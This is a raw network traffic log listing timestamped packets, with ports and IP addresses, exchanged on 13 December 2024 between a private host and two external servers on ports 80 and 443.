Dec 13, 2024 18:53:44.243268967 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.243350983 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.243388891 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.243427038 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.245039940 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.245085955 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.248703957 CET	443	49896	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:44.248868942 CET	49896	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:44.339647055 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.339750051 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.339829922 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.339829922 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.340305090 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.340342045 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.340373039 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.340415001 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.341579914 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.341631889 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.341672897 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.341716051 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.342922926 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.342974901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.343003035 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.343039989 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.344273090 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.344315052 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.344542980 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.344583988 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.345541954 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.345585108 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.345608950 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.345649004 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.346822977 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.346870899 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.346910000 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.346951962 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.348129034 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.348176956 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.348282099 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.348323107 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.349354982 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.349400997 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.349438906 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.349478960 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.350712061 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.350779057 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.350851059 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.350892067 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.351926088 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.351969004 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.352008104 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.352050066 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.353161097 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.353207111 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.353245974 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.353286028 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.354350090 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.354402065 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.354449034 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.354491949 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.355649948 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.355694056 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.355736971 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.355777025 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.356823921 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.356870890 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.356884003 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.356930017 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.357970953 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.358021975 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.358069897 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.358114004 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.359199047 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.359241009 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.359318972 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.359354973 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.360413074 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.360459089 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.360492945 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.360538006 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.361547947 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.361603975 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.361705065 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.361752033 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.362742901 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.362801075 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.362839937 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.363079071 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.363919020 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.363960981 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.364103079 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.364120007 CET	49896	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:44.364142895 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.364217043 CET	443	49896	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:44.364790916 CET	443	49896	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:44.364857912 CET	49896	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:44.365029097 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.365073919 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.365142107 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.365180016 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.366225004 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.366282940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.366348028 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.366389990 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.366791964 CET	49896	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:44.367328882 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.367382050 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.367451906 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.367492914 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.368472099 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.368520021 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.368633032 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.368684053 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.369590998 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.369680882 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.369721889 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.369796991 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.370755911 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.370805025 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.370888948 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.370930910 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.371932983 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.371994019 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.372039080 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.372080088 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.373044014 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.373090029 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.373161077 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.373241901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.374241114 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.374290943 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.374329090 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.374373913 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.375355959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.375411987 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.375463963 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.375508070 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.376514912 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.376566887 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.376627922 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.376671076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.377609015 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.377660036 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.377702951 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.377746105 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.378829002 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.378876925 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.378901958 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.378947020 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.379914045 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.379965067 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.380007029 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.380054951 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.381139994 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.381196022 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.381208897 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.381257057 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.382196903 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.382247925 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.382287025 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.382332087 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.383361101 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.383428097 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.383565903 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.383611917 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.384577990 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.384627104 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.384670973 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.384722948 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.385725975 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.385778904 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.385868073 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.385911942 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.386738062 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.386795044 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.386842012 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.386894941 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.387926102 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.387973070 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.388108969 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.388156891 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.389045954 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.389091015 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.389131069 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.389177084 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.390201092 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.390255928 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.390307903 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.390352964 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.391392946 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.391438961 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.391490936 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.391541958 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.392492056 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.392546892 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.392599106 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.392760992 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.393629074 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.393704891 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.393753052 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.393807888 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.394777060 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.394917965 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.394969940 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.395019054 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.395911932 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.395960093 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.396004915 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.396050930 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.397067070 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.397111893 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.397214890 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.397274971 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.398216963 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.398262024 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.398305893 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.398350000 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.399333000 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.399379015 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.399419069 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.399462938 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.400604010 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.400650978 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.400721073 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.400767088 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.401562929 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.401611090 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.407327890 CET	443	49896	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:44.531600952 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.531652927 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.531816959 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.531816959 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.532089949 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.532133102 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.532185078 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.532222986 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.533071041 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.533132076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.533174992 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.533221960 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.534058094 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.534115076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.534398079 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.534445047 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.534596920 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.534643888 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.535459995 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.535517931 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.535559893 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.535604954 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.536478043 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.536581993 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.536650896 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.536695957 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.537501097 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.537555933 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.537600040 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.537643909 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.538501978 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.538553953 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.538630009 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.538676023 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.539586067 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.539643049 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.539788961 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.539836884 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.540575981 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.540628910 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.540667057 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.540707111 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.541564941 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.541620016 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.541768074 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.541815996 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.542623043 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.542669058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.542829990 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.542881012 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.543647051 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.543694019 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.543726921 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.543790102 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.544663906 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.544728994 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.544817924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.544864893 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.545694113 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.545746088 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.545876026 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.545919895 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.546727896 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.546773911 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.546802044 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.546844959 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.547758102 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.547806025 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.547936916 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.547991037 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.548749924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.548796892 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.548840046 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.548883915 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.549824953 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.549876928 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.549931049 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.549978018 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.550805092 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.550848961 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.550879955 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.550926924 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.551810026 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.551865101 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.551954031 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.552000999 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.552881002 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.552927971 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.552966118 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.553009033 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.553883076 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.553937912 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.554008007 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.554049969 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.554876089 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.554919958 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.554966927 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.555010080 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.555938959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.555985928 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.556112051 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.556153059 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.557010889 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.557055950 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.557243109 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.557285070 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.558057070 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.558100939 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.558213949 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.558255911 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.559025049 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.559072971 CET	49895	80	192.168.2.7	31.41.244.11
